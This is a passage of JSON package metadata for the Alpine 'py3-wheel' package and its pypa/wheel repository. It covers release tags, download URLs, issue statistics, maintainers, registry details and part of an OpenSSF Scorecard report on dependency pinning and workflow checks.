a":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:26.514Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":12.687646501421376,"forks_count":9.640416936811132,"docker_downloads_count":null,"average":5.582015859558127},"purl":"pkg:apk/alpine/py3-wheel?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.18","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-wheel/codemeta","maintainers":[{"uuid":"alice@ayaya.dev","login":null,"name":"psykose","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=psykose","packages_count":493,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=psykose","role":null,"created_at":"2023-05-22T20:58:23.405Z","updated_at":"2023-05-22T20:58:23.405Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/maintainers/alice@ayaya.dev/packages"}],"registry":{"name":"alpine-v3.18","url":"https://pkgs.alpinelinux.org/packages?branch=v3.18","ecosystem":"alpine","default":false,"packages_count":20068,"maintainers_count":367,"namespaces_count":2,"keywords_count":3640,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1185},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-05-22T10:43:30.622Z","updated_at":"2026-06-10T05:19:44.026Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/namespaces"}},{"id":6044327,"name":"py3-wheel","ecosystem":"alpine","description":"built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":14,"first_release_published_at":"2022-11-22T19:33:17.000Z","latest_release_published_at":"2026-04-22T23:02:09.000Z","latest_release_number":"0.47.0-r0","last_synced_at":"2026-04-22T23:16:13.780Z","created_at":"2023-01-31T17:59:28.050Z","updated_at":"2026-04-22T23:16:14.225Z","registry_url":"https://pkgs.alpinelinux.org/package/edge/main/x86_64/py3-wheel","install_command":"apk add py3-wheel","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 